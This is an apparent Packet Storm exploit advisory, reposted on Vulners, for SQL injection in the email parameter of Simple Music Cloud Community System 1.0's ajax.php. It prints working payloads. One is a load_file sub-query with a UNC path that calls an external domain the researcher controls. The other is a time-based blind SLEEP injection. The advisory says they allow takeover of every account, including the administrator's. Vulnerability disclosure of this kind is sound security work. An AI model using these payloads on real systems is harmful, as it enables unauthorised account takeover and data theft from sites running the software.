Lucene search
K

Simple Music Cloud Community System 1.0 SQL Injection

🗓️ 06 Jan 2022 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 405 Views

Simple Music Cloud Community System 1.0 SQL Injection email parameter is vulnerable to SQL injection attacks. Payload injects a SQL sub-query, allowing an attacker to take control of all accounts, including administrator account

Code
`## Title: Simple Music Cloud Community System 1.0 SQL - Injections  
## Author: nu11secur1ty  
## Date: 01.05.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/14605/simple-music-cloud-community-system-using-phpmysqli-source-code.html  
  
## Description:  
The `email` parameter in `/music/ajax.php` from Simple Music Cloud  
Community System 1.0 appears to be vulnerable to SQL injection  
attacks.  
The payload '+(select  
load_file('\\\\bbqv9il1nuxps6uwt46g84o25tbmzdw7kynmf95xu.nu11secur1tyPenetrationTestingEngineer.net\\jeu'))+'  
was submitted in the email parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker can take account control of all accounts plus an  
administrator account on this system.  
Status: CRITICAL  
  
[+] Payload:  
  
```mysql  
---  
Parameter: email (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: [email protected]'+(select  
load_file('\\\^beqku.nu11secur1tyPenetrationTestingEngineer.net\^beqku'))+''  
AND (SELECT 5251 FROM (SELECT(SLEEP(3)))yymL) AND  
'JocD'='JocD&password=debeliqkur  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Simple-Music-Cloud-Community-System)  
  
## Proof and Exploit:  
[href](https://streamable.com/i2yjbv)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation